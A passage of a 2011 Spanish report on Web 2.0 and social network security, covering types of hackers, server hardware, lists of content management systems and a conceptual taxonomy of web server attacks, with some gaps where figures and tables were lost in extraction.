combinar DWR con otras librerías como YUI (Yahoo User Interface), JQuerym Oritityoem
Scriptaculous, Dojo, Spry, etc.
DWR19 también permite a JavaScript manipular fácilmente HTML de la web, por ejemplo,
obteniendo datos de formularios HTML form, tags de HTML, clonar tags, sacar fácilmente
valores de tags.
Otra herramienta similar es GWT20 (Google Web Toolkit) que permite crear aplicaciones AJAX
en lenguaje Java, para poder ejecutarlas en JavaScript ya que funciona automáticamente en
los clientes web. La idea es crear aplicaciones en AJAX en Java y compilarlas para que el
resultado final sea JavaScript.GWT elimina todo el código que sea innecesario para disminuir
así el peso del archivo final.
19
Podemos obtener esta librería en http://directwebremoting.org/dwr/download.html
20
Para más información o descarga de la herramienta http://code.google.com/webtoolkit/
Página 86
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 8
Aspectos de la seguridad en Web
2.0
8.1. ¿Quién nos vigila?
A menudo cuando alguien irrumpe en un sistema informático se dice que ha sido un “hacker”
y se tiende a pensar que lo ha hecho de la manera más sofisticada posible y que su grado de
conocimientos informáticos tiene que ser muy elevado, pero… ¿qué es un hacker?
Hoy por hoy se asocia a la palabra hacker con la de pirata informático, pero ha tenido otras
connotaciones en el pasado. En un principio, cuando empezó a surgir el término hacker en los
años 50 se refería para describir a aquellos que eran expertos programadores. En los años 70,
“hacker” describía a los revolucionarios informáticas que fundaron empresas de IT muy
importantes. En los años 80 empezó a tener una connotación negativas refiriéndose a la
piratería de videojuegos.
Existen diferentes tipos de piratas informáticos; vamos a ver una clasificación de ellos
obtenida de http://kioskea.net.
Página 87
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
- Phreakers: se trata de piratas informáticos que piratean las líneas telefónicas. Usan la
RTC21 (de las siglas Red Telefónica Conmutada) para hacer llamadas gratis a través de
circuitos telefónicos.
- Carders: estos piratas son los que tienen conocimientos en sistemas de tarjetas
inteligentes y se aprovechan de sus vulnerabilidades para atacar. Normalmente este
tipo de ataque se realiza sobre tarjetas bancarias.
- Crakers: este tipo de usuarios se encargan de atacar a los sistemas informáticos
software y SO craqueando la protección anticopia con licencia de ellos. Crean los
programas llamados “crack” que se trata de un ejecutable que se encarga de modificar
el software de fábrica o de crear números de licencia falsos para activar de manera
ilícita este software.
- Hacktivisitas: se trata de hackers con una ideología como tal; este término se creó
para designar a una comunidad paralela llamada underground.
El término hacker es algo abstracto en realidad ¿nos tenemos que preocupar de “el hacker”
como tal? Cuando alguien realiza ataques a nuestra empresa puede ser un atacante que no
tenga nada que ver con ella o un empleado mismo de la empresa. Los hackers más peligrosos
para nuestros servidores son los ex-empleados ya que estos están furiosos por no poder seguir
trabajando dentro de la empresa y por cualquier razón intentan atacar las máquinas en busca
de información o simple diversión; de ahí que las políticas de seguridad sean estrictas y si
alguien no trabaja en la empresa no pueda tener acceso a los sistemas de ella.
21
La Red Telefónica Conmutada es una red de comunicación diseñada para transmisiones de voz, pero puede también soportar
otro tipo de datos como faxes o conexiones a Internet. Se trata de una red telefónica clásica.
Página 88
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Una de las más importantes fuentes de vulnerabilidades en la Web 2.0 son los inadecuados
marcos de acceso y autorización usados en estos entornos, remarcando algunos casos en los
que estas políticas son deliberadamente relajadas u obviadas con propósitos dañinos. En otras
ocasiones estos problemas provienen de la dificultad de encontrar un adecuado equilibrio
entre proporcionar suficiente libertad a las aplicaciones Web 2.0 y garantizar una seguridad
aceptable.
La Web 2.0 ha traído consigo una gran cantidad de cambios en la manera en la que la
información y el conocimiento son tratados. Una página web aloja contenido e incluso
ejecutables provenientes de múltiples fuentes incluidos usuarios finales, y la información
puede ser alterada muchas veces desde su origen.
Página 89
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 90
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Segunda parte
Aspectos de seguridad en Web 2.0
y redes sociales
Página 91
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 9
Introducción a la seguridad 2.0
En esta segunda parte se va dejar a un lado lo que es el desarrollo e historia de la Web 2.0 y
nos vamos a centrar básicamente en la seguridad que engloba todo el mundo 2.0.
La mayor dificultad de la seguridad 2.0 es que no existe concienciación por parte de los
usuarios frente a la responsabilidad que deben de tener a nivel individual frente a la seguridad
en la Web 2.0. En los entornos de redes sociales los usuarios tienen la sensación de
encontrarse en un sitio seguro pensando que se encuentran en una red cerrada cuando no es
así. Esto permite a los atacantes aprovecharse de ello a través de ingeniería social. Cuando los
usuarios abren un video de Youtube desde Facebook no saben que pueden estar sometidos a
un ataque de cross-site scripting o que los links que ven en sus redes sociales pueden referirse a
sitios maliciosos que incluyen técnicas de pishing o pharming. Otra vía de ataque esencial en el
mundo 2.0 son los websites de ebanking o websites que ofrecen servicios financieros y que
pueden poner en peligro nuestros datos financieros.
Otro tema relacionado con la seguridad 2.0 y que esta en auge, viene de la mano de los
dispositivos móviles y más concretamente de los smartphones. En ellos almacenamos más
información personal que en cualquier otro dispositivo y no solo eso, si no que gracias a la
cultura “always on”23 de estos dispositivos, mantenemos estos datos personales al alcance de
22
McAfee at the World Economic Forum, Davos.
http://www.mcafee.com/us/about/press/corporate/2009/20090129_063500_j.html
23
Internet Facilitated Organised Crime, threat assesment de la Europol.
http://www.europol.europa.eu/publications/Serious_Crime_Overviews/Internet_Facilitated_Organised
_Crime_iOCTA.pdf
Página 92
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
los atacantes 24x7 ya que siempre estamos conectados a nuestras redes sociales y programas
de mensajería instantánea y lo hacemos sin ningún tipo de seguridad.
Otro tema crucial es el de las Botnets. Estas redes roban información privada personal y
financiera, envían malware de tipo spam, virus, troyanos, software espía, etc. y realizan
ataques de DoS (Denial of Service) desde multitud de máquinas hacia usuarios concretos o
empresas.
Algo que se empieza a escuchar cada vez más cloud computing. El problema de esta filosofía
viene a la hora de dejar los datos confidenciales de las empresas en terceras máquinas donde
pueden ser expuestos a más ataques. Las empresas deberán encontrar el equilibrio entre la
confidencialidad de sus datos y la disponibilidad de estos a la hora de incluir su información
dentro de esta nube de computación.
Todos estos temas que conciernen a la seguridad de la Web 2.0 los veremos desarrollados en
cinco grandes grupos que son:
24
Presentación “Seguridad 2.0” de CODIC.
http://www.cert.uy/historico/pdf/Presentacion_Seguridad_20.pdf
25
“La compañía Symantec publica nuevos datos con los que dar a conocer las redes de bots mas
importantes” por Desarrollo web. http://www.desarrolloweb.com/de_interes/ranking-botnets-agosto-
2010-4037.html
Página 93
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Primero analizaremos cada nivel de seguridad que existe en la Web 2.0, nivel de servidor, de
cliente o de tecnologías y lenguajes entre estos.
Finalmente desarrollaremos dos casos de uso relevantes en el mundo de la seguridad 2.0 que
son Facebook y Twitter y analizaremos la influencia de estas redes sociales en la actualidad
desde todos sus ámbitos enfocándonos siempre a la seguridad de estas redes.
Página 94
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Capítulo 10
Hardware y software del servidor
10.1. Introducción
La funcionalidad de un servidor Web 2.0 se basa en la arquitectura de un servidor web, pero un
servidor Web 2.0 deberá de soportar mucha más conexiones de usuarios de manera
simultánea que un servidor web tradicional. Las empresas web usan servidores dedicados,
que se trata de servidores que la empresa alquila y tiene el control completo sobre esos
servidores. Este tipo de servidores se suelen alojarse en el CPD (Centro de Procesamiento de
Datos) de las empresas.
Las empresas dedicadas a la Web 2.0 deben de proteger sus servidores a conciencia ya que es
dónde van dirigidos muchos de los ataques a las organizaciones y donde reside toda la
información de sus usuarios, información privada que hay que proteger y garantizar según la
LOPD (Ley Orgánica 15/1999 de de Protección de Datos de Carácter Personal).
Las Web 2.0 se centran mucho en la interfaz, sobre todo en la usabilidad de esta para que el
usuario sea capaz de encontrar rápidamente todo lo que busque. A parte de la interfaz,
también se busca que estas Webs sean funcionales y veloces, lo que requiere una gran
cantidad de recursos a nivel hardware.
Las empresas dedicadas a Web 2.0 tienen centros de servidores que gastan de 10 a 30 veces
más en energía por metro cuadrado que cualquier edificio normal de oficinas. Debido a esto
las empresas tecnológicas crean servidores especializados para este tipo de empresas. Por
ejemplo el servidor iDataPlex de IBM esta especialmente pensado para este tipo de servicios.
Página 95
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Las características básicas que debería englobar un servidor dedicado a Web 2.0
exclusivamente serían:
Si dentro de estas características englobamos algo más a nivel software, estas máquinas
deberán de incorporar un sistema operativo para poder trabajar con ellas, por ejemplo
Windows Server o Apache, y estos sistemas operativos deberán tener unas políticas de
seguridad muy estrictas y restrictivas.
Hay diferentes formas de trabajar con estos servidores de manera que las conexiones entre
cliente y servidor sean más rápidas y eficientes. La más popularizada son las bases de datos
distribuidas; se conectan varios maquinas para poder así procesar las aplicaciones en paralelo
aumentando los tiempos de respuesta para funciones de búsqueda.
Vamos a ver qué tipo de servidores que actualmente existen en la red y en las empresas:
Página 96
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El software de los servidores 2.0 suele tener un enfoque universal donde la funcionalidad
principal se encuentra en una sola plataforma de servidor o bien también se hace uso de
herramientas de publicación para la gestión dinámica de contenidos. La influencia que están
teniendo los portales 2.0 va unida al desarrollo de las herramientas Web para páginas Web,
cada vez más enfocadas a las redes sociales.
Tenemos una gran oferta de servidores web26 en el mercado para elegir. Los más populares:
26
Fuente: http://www.tutorialspoint.com/web_developers_guide/web_server_types.htm.
27
Fuente: http://es.wikipedia.org/wiki/Cherokee_(servidor_web).
Página 97
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Oracle
IBM DB2
Microsoft SQL Server
MySQL
Informix
Sybase
PostgreSQL.
El software de los servidores también lo podemos enfocar a nivel de tecnologías como AJAX
que es la más destacada en la Web 2.0, pero lo veremos más en la parte de comunicación
entre cliente y servidor.
Vamos a desarrollar más en profundidad el tema de los CMS ya que es el software que va más
enfocado exclusivamente a las redes sociales y portales 2.0.
10.3.1.1. Introducción
En el pasado, administrar una web era un trabajo tedioso y laborioso ya que las herramientas
usadas eran editores WYSIWYM28, más enfocados a la creación que al mantenimiento,
contrapuestos al paradigma WYSIWYG29. Los CMS nos proporcionan un entorno que nos
permite gestionar, actualizar y mantener nuestro portal Web con múltiples usuarios. Una de
las mayores ventajas actualmente de los CMS es que disponemos de gran variedad de ellos
para cualquier ámbito y que muchos de ellos son de código abierto, es decir que tenemos
acceso libre a estos.
28
WYSIWYM, del inglés What You See Is What You Mean que significa “lo que ves es lo que quieres decir”. Se trata de un modelo
de edición de páginas Web donde el usuario introduce el contenido Web de manera estructurada siguiendo el valor semántico,
pero no representa el formato final.
29
WYSIWYG, del inglés What You See Is What You Get, contrapuesto al paragidma WYSIWYM. WYSIWYG es hoy en día más
aceptado en internet. La edición de páginas Web este dominada por este modelo, donde el formato de los documentos es
habitualmente HTML.
Página 98
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
permaneciese inalterable y así poder modificar el diseño de la web de manera más fácil y
eficiente.
Creación de contenido
Un CMS permite que un usuario sin amplios conocimiento técnicos pueda centrarse en el
contenido y en el diseño a la vez; esto se consigue habitualmente con editores de texto al
estilo WYSIWYG donde el usuario puede ver el resultado final a la vez que crea el contenido de
manera limitada.
Para la creación de contenido un CMS aporta herramientas que permiten definir la estructura,
formato de las páginas mediante uso de patrones, diseño de las páginas y un sistema modular
para permitir futuros cambios.
Gestión de contenido
Los CMS nos aportan herramientas para la gestión de los datos de la Web de manera
estructurada y jerárquica permitiendo modificaciones. En la base de datos de la Web se
almacena múltiple información como datos relativos a los documentos con sus versiones,
autor, fecha, caducidad…
Publicación
Una vez que el artículo o la página se aprueban, se publica hasta su fecha de caducidad y se
hace atendiendo a los patrones predefinidos para esa sección. Según las diferentes secciones
tendrán un aspecto consistente para todas las Webs. Como comentábamos al principio, esta
separación entre contenido y forma permite gestionar el sitio Web de manera muy versátil.
Presentación
Los CMS gestionan de manera automática la accesibilidad a la web con soporte de normas
internacionales como la WAI (Web Accessibility Initiative) del W3C (World Wide Web
Consortium) y se adaptan a las preferencias de cada usuario. Los CMS proporcionan
30
“How to evaluate a content management system” por James Robertson, 2002.
http://www.steptwo.com.au/papers/kmc_evaluate.
31
Flujo de trabajo (del inglés workflow) se refiere a las operaciones de una actividad de trabajo, es decir, cómo se estructuran las
tareas, cómo se realizan, cuál es su orden, cómo se sincronizan, como fluye la información y cómo se realiza el seguimiento y
cumplimiento de estas tareas.
Página 99
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El CMS también gestiona los menús de navegación o la jerarquía de la Web actual, añadiendo
links de manera automática; también se encarga de la gestión de módulos internos y
externos, para poder diferenciar entre secciones o poder modificar el diseño de manera
dinámica.
10.3.1.4. Historia
A principio de los noventa el concepto de CMS era desconocido. Los primeros CMS los
desarrollaron organizaciones que publicaban gran cantidad de contenidos en internet como
revistas, periódicos o publicaciones corporativas.
En el año 1994, Illustra Information Technology usaba una BD de objetos con repositorio de
los contenidos de una Web, con el objetivo de poder reutilizar objetos y ofrecer un entorno a
los autores basados en patrones. Esta iniciativa no triunfo del todo y la empresa fue comprada
por AOL y la BD por Informix. En este mismo año, RedDot comenzó a desarrollar un gestor de
contenidos, que fue presentado a finales de 1995.
32
Groupware o software colaborativo se trata del conjunto de programas informáticos que integran el trabajo de un proyecto con
múltiples usuarios concurrentes en diferentes estaciones de trabajo a través de internet. Ejemplo de este software pueden ser el
correo electrónico, publicación Web, conferencias de voz, video o datos, calendarios electrónicos, sistemas de gestión de
proyectos, redes sociales, etc.
Página 100
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Se podría decir que el paradigma de los CMS en la actualidad es Wordpress, sino veamos este
gráfico33 elaborado por Technorati.
Alguna de las iniciativas actuales de estandarización más importantes son las portlets34:
Algunos de los estándares incluyen CSS (creación de hojas de estilo), XML (lenguaje de
marcado que permite estructurar el documento), XHTML (mezcla de CSS y XML orientado a la
presentación de documentos), WAI (accesibilidad del sistema) y RSS (para sindicación de
contenidos).
33
“Los CMS más utilizados por las grandes páginas” de SoyGik, informe elaborado por Technorati, 2008.
http://www.soygik.com/los-cms-mas-utilizados-por-las-grandes-paginas/.
34
Los portlets se tratan de componentes modulares de las interfaces de usuario que se gestión y se visualizan a través de una
Web. Estos componentes producen fragmentos de código de marcado generando contenido de manera dinámica. Una Web se
puede definir como una colección de ventanas de portlets. Por ejemplo para el correo un portlet puede ser el parte meteorológico,
un foro, noticias…
Página 101
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Las aplicaciones más comunes que rodean los CMS son servidores Apache e ISS (Internet
Information Server), como aplicaciones de servidor y bases de datos MySQL y PostgreSQL.
Debemos destacar LAMP, un conjunto de sistemas software que son necesarios para alcanzar
una solución global para configurar un sitio web o un servidor de manera dinámica. LAMP
adquiere sus siglas de Linux como sistema operativo, Apache como servidor web, MySQL
como gestor de bases de datos y Perl, PHP o Python como lenguajes de programación.
Cuando los productos del mercado se estabilicen y haya más competencia, los
CMS se convertirán en artículos de consumo. Al haber más competencia
disminuirán los precios y aumentaran las funcionalidades de estos.
Empresas que implementan Webs cerraran y otras nuevas saldrán al mercado, de
tal manera que éste ira madurando adquiriendo consistencia y profesionalidad.
Al tender cada vez más a la estandarización, habrá proyectos que no se ajusten a
estos y fracasarán por no cumplir criterios de usabilidad, arquitectura de la
información, gestión de conocimiento o contenido.
Se adoptarán estándares de almacenaje, estructuración y gestión de contenidos.
Se fusionarán la gestión de contenidos, gestión de documentos y gestión de
registros
Los CMS de código abierto seguirán una línea de desarrollo similar hasta hora.
Muchos administradores utilizan CMS de manera gratuita para gestionar su portal para
obtener una Web dinámica y con múltiples funcionalidades.
Destaquemos los puntos más importantes por los que se necesitaría un CMS:
Página 102
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Código abierto. Existen múltiples CMS de código abierto para todos los ámbitos y
muy profesionales, por lo que no será necesario escoger un CMS comercial. Se
puede considerar que un CMS con licencia al ser de pago es más estable y
coherente, pero en este ámbito esto no es del todo así, ya que los CMS de código
abierto también están coordinados por grupos de trabajo y empresas de manera
similar a los comerciales.
Arquitectura técnica. Tiene que diferenciar entre contenido y diseño, así como
una estructura estable elaborada a base de módulos para futuras modificaciones.
Grado de desarrollo. Según la madurez de la aplicación.
Soporte a usuarios. El CMS deberá ofrecer soporte a usuarios, tanto de los
creadores como por parte de los desarrolladores.
Usabilidad. El CMS deberá ser fácil de utilizar y de rápido aprendizaje para que un
usuario sin amplios conocimientos técnicos le pueda sacar el máximo
rendimiento.
Página 103
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Lenguaje de programación:
ASP
Java
PHP
ASP.NET
Ruby On Rails
Python
35
WAI, Iniciativa para la Accesibilidad Web. Es una rama del W3C que vela por la accesibilidad de la Web.
Página 104
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
36
Fuentes obtenidas para el listado:
“Listado de sistemas de gestión de contenidos” de Ecured, abril de 2010.
http://www.ecured.cu/index.php?title=Listado_de_sistemas_de_gesti%C3%B3n_de_contenidos&oldid=45314.
“Gestores de contenidos” de Joomlamalaga. http://www.joomlamalaga.es/diseno-web-joomlamalaga/gestores-contenidos-
cms.html.
“Sistema de gestión de contenidos” de Wikipedia, septiembre de 2010.
http://es.wikipedia.org/wiki/Sistema_de_gesti%C3%B3n_de_contenidos.
Página 105
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
cmsMadeSimple PHP CMS fácil de usar y con muchos "add-ons" para Cmsmadesimple.org
añadir.
door108 PHP CMS totalmente en español basado en e107. Door108.com.ar
Incluye novedades como sistema de
administración multitarea y multiarea para la
creación de cientos de sitios sin ocupar casi
espacio físico.
Dédalus PHP CMS que pretende ser una revolución en el mundo Truzone.org
de los gestores de contenidos, centrándose en la
seguridad, mejora de características tradicionales
e incorporación de ideas innovadoras.
DotNetNuke .NET CMS desarrollado en .NET, gratis y con fuentes. Dotnetnuke.com
nota: Más que un CMS en sí es un Framework de
.NET pensado para desarrollar CMS entre otras
cosas.
Dragonfly CMS PHP Portal que auna en su core: foros, galerías de Dragonflycms.org
fotos, descargas y noticias, entre sus módulos más
representativos.
Drupal PHP Poderoso CMS muy conocido por la calidad de su Drupal.org
código y por la seguridad que brinda, es estable y
de actualización continua, configuración sencilla,
instalación ágil, importante cantidad de módulos y
temas visuales, excepcional documentación y
comunidad activa y muy amigable, gran concepto
de nodo.
DynamicWeb .NET CMS desarrollado en .NET, solución con más de 60 Dynamicweb.es
CMS módulos y una aplicación completa de
eCommerce.
Elgg PHP CMS muy completo y fácil de administrar y usar, Elgg.org
ideal para usuarios con nuevos.
E107 PHP CMS muy completo y fácil de administrar y usar, E107.org
ideal para usuarios con conocimientos generales
acerca de estos sistemas. Sencillo sistema de
instalación, amplia selección de temas visuales y
módulos, muy flexible, backend muy bien
ordenado, drop down menú agradable y
organizado.
eZ Publish PHP CMS framework muy potente que sirve para Ez.no
páginas Webs, intranets, comercio electrónico,
extranets y portales.
Gekko PHP CMS en español muy seguro, fácil de configurar y Unixmexico.org
altamente escalable.
Jaws PHP Framework y CMS amigable para el usuario y Jaws-project.com
desarrollador.
Joomla PHP y Versión surgida de Mambo independiente de la Joomla.org
MySQL empresa que está detrás de Mambo. Instalación
muy sencilla y con muchas extensiones y módulos,
la documentación es exhaustiva y concisa, interfaz
de la administración muy intuitiva y poderosa,
backend muy utilizable y editor WYSIWYG,
opciones de personalización, una gran comunidad
de usuarios.
Jupiter Content PHP y Jupiter es una herramienta potente y fácil de usar Script.wareseeker.com
Manager MySQL que usa MySQL como base de datos.
Página 106
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 107
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 108
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
.LRN
ANGEL Learning
Apex Learning K-12
TeleAprendizaje
ATutor
Blackboard
Bodington
Claroline
ClassCentral
Click-a-teacher
Desire2Learn
Digilearn²
Dokeos
eCollege
Edumate
FirstClass
FrogTeacher
Fronter
ILIAS
Kaleidos (VTLE)
LON-CAPA
Moodle
OLAT
Sakai Project
Scholar360
VClass
WebCT
CLIX
Studywiz
Ossett
Teletop
Página 109
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 110
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
AST X-CMS Un CMS hecho en ASP, almacena los datos en archivos XML, maneja
múltiples formatos, foros, blogs.
Autoeditable. Autoeditable está orientado a pequeñas empresas y profesionales que
necesiten una Web y poder autogestionar sus contenidos de forma fácil y rápida.
Aurix Software Solutions. Aurix Software Software (que incluye aurix Portal System,
aurix Project Management, aurix Balanced Scorecard, etc.) son soluciones de Magia
Comunicaciones S.A. orientadas a compañías que requieran un sistema modular y
robusto para la administración de portales y manejo de contenidos, permitiendo la
entrega de servicios personalizados y la creación de contenidos a través de
administradores Web de fácil utilización.
Hábitat Portal. Hábitat es un CMS en español, Amigable, Personalizable, Orientado a
servicios y Generador de comunidades.
Content-SORT, clasificado como Sistema de Gestión de Portales y de Contenidos
Web (CMS), soporta todos los estándares Web W3C y de accesibilidad definidos por la
WAI. Orientado originalmente sobre tecnología LAMP, realmente es multiplataforma
(PHP), y se basa en una arquitectura de 3 capas: Bases de Datos, Aplicación,
Presentación. Sitio oficial Content-SORT
Infodata de dbyse systems (www.dbyse.com), es un gestor de contenidos avanzado
para el mundo editorial, con capacidad para manejar más de 60 tipos distintos de
ficheros, provenientes de casi cualquier canal informativo, homogeniza los contenidos
en base de datos y los muestra a los clientes a través de una Web publicada en la
intranet
Eximius2 CMS. Eximius2 CMS es un sistema de gestión de contenidos que permite la
administración completa de un portal o sitio Web, y es lo suficientemente flexible para
crecer junto con cualquier organización desde muy pequeña hasta grandes
productores de información. El sistema incluye Modelado de Contenidos, Gestión de
Versiones, contenidos Multi-Idioma, Formularios dinámicos, etc.
Globalsys, * El primer gestor de portales y contenidos que se comercializo en España.
Actualmente más de 400 empresas lo utilizan.
AWM: Avant Site Web Management]] pertenece a la última generación de Flash
CMS's o Flash Content Management Systems, creados para la Web 2. Es uno de los
pocos del mercado que permite a los Web masters crear sitios enteramente flash, con
contenidos multimedia embebidos (no emergentes) y gestión de contenidos.
También da la posibilidad de que el usuario final tenga su propio site Flash CMS.
Civinext Groupware 2.0 Es una plataforma desarrollada exclusivamente para
administrar de manera eficiente la gestión de la comunicación interna y externa en
una organización. Se caracteriza por integrar diferentes sistemas en uno solo: los
sistemas de gestión de contenidos (CMS) multimediales, los sistemas de
postulaciones laborales (E-Recruitment), la administración de eventos, la gestión de
blogs interactivos, la gestión de sistemas de encuestas y la gestión de empleados e
internos.
Contendo CMS. Permite al usuario actualizar la información de su sitio Web de una
forma muy rápida y sencilla, sin necesidad de conocimientos técnicos. Desarrollado
por Ensitech.
VRContents (Perl) Es un CMS desarrollado en Chile por VRWEB orientado a ser
flexible y configurable para cada necesidad.
Prodigia Easy Site Manager (Flash 8, PHP, MySQL, AS 2.0) Innovador y funcional
Flash CMS. Implementa ingeniería del SW por capas. Permite crear portales, Webs
corporativas o tiendas virtuales con pasarela de pago 100% Flash. Fácil (cualquier
usuario sin conocimientos técnicos lo gestiona), ágil e intuitivo. Gestión WYSYWYG,
Página 111
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 112
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 113
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 114
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
10.4.1. Introducción
La gran mayoría de los ataques a servidores Web es a nivel de software. También hay ataques
dependientes de los sistemas operativos que se encuentran instalados en el servidor y del mal
uso que se podría hacer de la configuración del servidor o de las políticas de seguridad
definidas.
Observando la imagen anterior, nos damos cuenta de que un servidor web tiene diferentes
puntos por donde por atacar.
Página 115
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
1. Acceso Físico. Se trata del daño que podrían sufrir físicamente las máquinas, a
nivel de hardware. Modalidades:
a. Terremotos, vibraciones, inundaciones, incendios, humedades
b. Interrupción del suministro eléctrico, anomalías de tensión, interferencias
electromagnéticas, tormentas eléctricas, interferencias
electromagnéticas
c. Vandalismo, atentados, robos, apagado manual de las máquinas
2. Intercepción de Comunicaciones. Si se puede ser capaz de interceptar las
comunicaciones que van al servidor y éstas no viajan de manera segura por la red
con un cifrado adecuado se podría obtener información privilegiada por terceros
usuarios. Modalidades:
a. Monitorear el tráfico de red
b. Análisis de puertos
c. Secuestro de sesión
d. Falsificación de identidad
e. Redirección o alteración de mensajes
3. Denegación de Servicio (DoS). Un ataque de denegación de servicio trata de
hacerse con los recursos del sistema para colapsarlos y provocar una caída del
servidor o la interrupción del servicio.
a. Debilidades TCP/IP
b. Debilidades en el software del servidor
c. Debilidades del sistema operativo
4. Intrusiones. Si un atacante fuera capaz de acceder al sistema operativo y elevar
los privilegios hasta nivel de root podría afectar gravemente a la seguridad del
servidor así como el conseguir insertar algún tipo de malware como virus o
troyanos.
5. Ingeniería social. La ingeniería social es uno de los recursos más utilizados y uno
de los eslabones más peligrosos de la cadena ya que depende de la ingenuidad de
los usuarios.
6. Puertas traseras. Los programas pueden contener errores de programación que
aunque no afecten al funcionamiento normal de la aplicación sí que podrían
suponer una vulnerabilidad para poder ser explotadas por un atacante
Página 116
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Normalmente los atacantes no usan directamente su máquina para su objetivo sino que hacen
uso de máquinas intermedias para dejar el menor rastro posible de su identidad.
Activos y Pasivos
1. Activos
2. Pasivos
Sistema y Aplicación
1. Ataques a nivel de sistema
2. Ataques a nivel de aplicación
Ataques típicos
1. Spoofing
a. IP Spoofing
b. ARP Spoofing
c. DNS Spoofing
d. Web Spoofing
2. DoS
a. DoS (Denegación de Servicio)
b. DDoS (Denegación de Servicio Distribuido)
3. Exploración de puertos
4. Pingflood (inundación por ping)
5. Smurf
6. Synflood (inundación SYN)
7. Ataque de fragmentación
8. Ataque SNMP
9. Inyección de SQL
10. Código fuente pobre
11. Ataque por manipulación de datos
12. Ataques de manipulación de URL
13. Ataques de secuencia de comandos entre páginas web (XSS)
Página 117
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
1. Ataques Pasivos
En los ataques pasivos, el pirata informático no modifica ningún tipo de información sino que
simplemente escucha o ve la información que se encuentra en el servidor.
Con este tipo de ataque se puede obtener información, sin modificarla, que le puede ser de
alguna manera útil al atacante.
Este tipo de ataque aparte de recoger información confidencial también analiza el tráfico de
manera que puede obtener de éste análisis las IPs de origen y destino, el volumen de
información que se está transmitiendo y en qué momento del día se realiza este tráfico de
datos.
La mayor ventaja, para el atacante, es que no deja casi huella, ya que al no provocar ninguna
alteración de información es casi imposible de detectar. La manera de evitar este ataque
puede ser usando conexiones seguras a la web como conexiones SLL (Security Socket Layer) o
cifrando la información.
Este ataque suele ser un primer paso para posteriores ataques activos, primero analizan la
información y el estado de las conexión y posteriormente se procede a realizar algún tipo de
ataque activo.
2. Ataques Activos
Estos ataques, al contrario que los pasivos, se dedican a modificar de alguna manera la
información o los paquetes enviados, pudiendo crear un flujo de datos falso y así tener la
posibilidad de hacer algún ataque del tipo ARP Spoofing (Address Resolution Protocol Spoofing)
que explicaremos posteriormente. Otro tipo de ataques pueden ser relacionados con
suplantación de identidad, modificación de mensajes, denegaciones de servicio, etc.
Página 118
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
GRAVEDAD DEL ATAQUE: la gravedad del ataque dependerá de la aplicación a la que se acceda
ya que no es lo mismo atacar a un servidor con imágenes de los usuarios que un ataque a una
aplicación de gestión y cuentas bancarias.
PERFIL DEL ATACANTE: el atacante deberá tener un nivel de conocimientos medio. Este tipo de
ataques es uno de los más populares y visibles.
GRAVEDAD DEL ATAQUE: la gravedad del ataque dependerá de la aplicación a la que se acceda
ya que no es lo mismo atacar a un servidor con imágenes de los usuarios que un ataque a una
aplicación de gestión y cuentas bancarias.
37
Un terminal remoto se trata de una máquina que hace la función de servir como front-end a otra máquina que se encargará de
gestionar las operaciones. También se podría definir como un software que permite el acceso a una máquina que no está a
nuestro alcance físico, que se podría decir que es el caso más habitual.
Página 119
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
1. Spoofing
EN QUÉ CONSISTE: esta técnica consiste en suplantar la identidad de otra máquina de la red
para tener acceso a los recursos de un tercer sistema de manera maliciosa basándose en algún
tipo de confianza ya sea el nombre o la dirección IP del host suplantado. Esto se puede realizar
a diferentes niveles, de ahí las distintas modalidades que tenemos de spoofing.
Las técnicas de spoofing van desde engañar al propio servidor falseando simplemente una
dirección IP hasta lo que sería engañar directamente al usuario final, es decir, entrando ya en
ingeniería social.
Una de las técnicas más típicas spoofing es el phising, que es un claro ejemplo de esta técnica a
alto nivel y que hoy en día es causa de múltiples fraudes en internet.
PERFIL DEL ATACANTE: un ataque de este tipo no es un ataque trivial, por lo que el atacante
deberá poseer un nivel de conocimiento alto y las organizaciones deben tener en cuenta que
es un ataque factible. Depende también del nivel del ataque; un ataque de tipo DNS Spoofing
será mucho más fácil de realizar que un ataque de tipo web spoofing por ejemplo.
GRAVEDAD DEL ATAQUE: dependerá de cada tipo de nivel de spoofing. Por ejemplo si hablamos
concretamente de DNS Spoofing suele ser a nivel local, es decir que el servidor DNS al que se
ataca se hace desde dentro de una empresa, es decir, dentro de la misma LAN (Local Area
Network), un ISP38 (Internet Service Provider) o una misma ciudad. La mayoría de estos ataques
spoofing van dirigidos a un host en concreto.
